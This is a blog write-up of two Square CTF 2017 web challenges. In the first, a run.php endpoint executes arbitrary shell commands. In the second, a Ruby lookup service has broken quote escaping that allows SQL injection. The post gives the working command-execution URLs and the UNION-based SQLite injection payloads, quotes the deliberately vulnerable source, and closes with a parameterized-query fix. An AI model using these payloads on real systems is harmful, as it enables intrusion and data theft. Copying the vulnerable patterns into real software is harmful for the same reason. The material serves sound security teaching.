Chybeta

Square CTF 2017-Web-writeup

Password checker: command execution
Little Doggy Tables: SQL injection

Password checker 50

Task

https://nybas-berog-bitev-fuhyn-fehyt.capturethesquare.com/

Solution

Viewing the page source reveals the following JavaScript:

<script type="text/javascript">
function validate(objForm) {
let toBeCheckedValue = objForm.elements['password'].value;
let xmlHttp = new XMLHttpRequest();
xmlHttp.open('GET', '/run.php?cmd=cat%20../password.txt', false);
xmlHttp.send(null);
let actualValue = xmlHttp.responseText;
if (toBeCheckedValue != actualValue) {
alert('Passwords don\'t match!');
} else {
alert('Password validated!');
}
}
</script>

Visit:

https://nybas-berog-bitev-fuhyn-fehyt.capturethesquare.com//run.php?cmd=cat%20../password.txt

This returns the password: password123. Entering it only pops up an alert box, nothing more.

Since run.php runs whatever is passed in cmd, try using command execution to locate the flag:

https://nybas-berog-bitev-fuhyn-fehyt.capturethesquare.com/run.php?cmd=find / | grep flag

https://nybas-berog-bitev-fuhyn-fehyt.capturethesquare.com/run.php?cmd=cat /secrets/..109810_05_10_06_49_46.546032825/flag

This yields the flag:

flag-tyzyd-gateh-lefif-girav-bobut

The source of run.php can also be read the same way; the whole script is:

<?php
$line = exec($_GET['cmd']);
echo $line;
?>

Little Doggy Tables 100

Task

"Oh, so you found it. Yes, it will tell you if a given agent is a dog or a cat, by looking up the appropriate value in its SQLite database. Good luck with that.
"Sure, the database contains some sensitive information, but our bulletproof firewall and top-notch quote escaping will ensure it never sees the light of day.
"Not secure? Huh? You don’t believe me? I’ll show you how secure. Here’s the source!"
USAGE EXAMPLE:
curl "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=Fido"
https://little-doggy-tables.capturethesquare.com

Solution

The source is as follows:

#!/usr/bin/env ruby
# author: Will McChesney <wmcc@squareup.com>
require "singleton" # not in the listing as posted, but `include Singleton` below needs it
require "sqlite3"
require "webrick"

PORT = ARGV[0]

class SecureDatastore
  include Singleton

  def initialize
    @db = SQLite3::Database.new("secure.db")
  end

  def secure_species_lookup(insecure_codename)
    # roll our own escaping to prevent SQL injection attacks
    secure_codename = insecure_codename.gsub("'", Regexp.escape("\\'"))
    # the "escaped" value is interpolated straight into the SQL text
    query = "SELECT species FROM operatives WHERE codename = '#{secure_codename}';"
    puts query
    results = @db.execute(query)
    return if results.length == 0
    results[0][0]
  end
end

server = WEBrick::HTTPServer.new(Port: PORT)
trap("INT") { server.shutdown }

class AgentLookupServlet < WEBrick::HTTPServlet::AbstractServlet
  def do_GET(request, response)
    response.status = 200
    response["Content-Type"] = "text/plain"
    # a nil lookup result makes `nil + "\n"` raise, so unknown codenames produce a 500
    response.body = SecureDatastore.instance.secure_species_lookup(request.query["codename"]) + "\n"
  end
end

server.mount "/agent_lookup", AgentLookupServlet
server.start

From the lengthy challenge description and the provided source, this is clearly a SQLite3 injection challenge.
The key lies in these two lines:

secure_codename = insecure_codename.gsub("'", Regexp.escape("\\'"))
query = "SELECT species FROM operatives WHERE codename = '#{secure_codename}';"

Every single quote ' is replaced with \' via the regex substitution, so that we cannot close the string literal. But if we pass in \', the substitution turns it into \\': the second \ is the one added by the replacement, and it is paired with the \ we supplied, so the two backslashes escape each other and our single quote is left free to terminate the literal.

In SQLite the comment marker is --, so try visiting:

https://little-doggy-tables.capturethesquare.com/agent_lookup?codename=\' or 1=1 --

The query the server then executes against the database is the following (note the \\):

SELECT species FROM operatives WHERE codename = '\\' or 1=1 --';

The single quote has successfully escaped the literal.

Next, consider how to extract data.

https://little-doggy-tables.capturethesquare.com/agent_lookup?codename=\' union select sql from sqlite_master limit 0,1--

The returned CREATE statement shows that the operatives table has three columns: codename, species, secret.

https://little-doggy-tables.capturethesquare.com/agent_lookup
?codename=\' union select secret from operatives limit 0,1--

Submitting this directly didn't work... Later I found that the limit needed to be changed. Final payload:

https://little-doggy-tables.capturethesquare.com/agent_lookup
?codename=\' union select secret from operatives limit 9,1--

flag:

flag-a3db5c13ff90a36963278c6a39e4ee3c22e2a436
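To see why the home-grown escaping fails and what the fix looks like, here is an added example (not the challenge's code or the author's) that re-creates the lookup in Python against an in-memory SQLite database: the flawed `'` to `\'` substitution from the Ruby source beside a parameterized query. The `operatives` table and its rows are constructed sample data; only the column names come from the writeup.

```python
import sqlite3


def build_db():
    # Constructed in-memory stand-in for the challenge's secure.db, using the
    # three columns recovered from sqlite_master (the rows are sample values).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE operatives (codename TEXT, species TEXT, secret TEXT)")
    db.executemany(
        "INSERT INTO operatives VALUES (?, ?, ?)",
        [("Fido", "dog", "sample-secret-1"), ("Tom", "cat", "sample-secret-2")],
    )
    return db


def flawed_escape(insecure_codename):
    # Same transformation as the challenge's Ruby gsub: each ' becomes \'.
    # SQLite does not treat backslash as an escape character at all, so this
    # neither neutralises a quote nor copes with an input ending in a backslash.
    return insecure_codename.replace("'", "\\'")


def vulnerable_lookup(db, codename):
    # String interpolation, as in the challenge: the "escaped" value is spliced
    # straight into the SQL text, so \' becomes '\\' and the literal closes early.
    query = f"SELECT species FROM operatives WHERE codename = '{flawed_escape(codename)}';"
    rows = db.execute(query).fetchall()
    return rows[0][0] if rows else None


def vulnerable_lookup_errors(db, codename):
    # True when the interpolated query is not even valid SQL, which happens for
    # any legitimate codename containing an apostrophe (SQLite expects '' not \').
    try:
        vulnerable_lookup(db, codename)
        return False
    except sqlite3.OperationalError:
        return True


def safe_lookup(db, codename):
    # Parameter binding: the value never becomes part of the SQL text, so
    # quotes, backslashes and comment markers in it cannot change the query.
    rows = db.execute(
        "SELECT species FROM operatives WHERE codename = ?", (codename,)
    ).fetchall()
    return rows[0][0] if rows else None
```

Feeding the writeup's `\' or 1=1 --` and `\' union select secret ...` inputs to `vulnerable_lookup` returns rows the caller never asked for, while `safe_lookup` returns nothing for them and still answers `dog` for `Fido`.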


Title: Square CTF 2017-Web-writeup

Author: chybeta

Published: 2017-10-05 20:10

Last updated: 2017-10-05 20:10

Original link: http://chybeta.github.io/2017/10/05/Square-CTF-2017-Web-writeup/

License: Attribution-NonCommercial-NoDerivatives 4.0 International. Please keep the original link and author when reposting.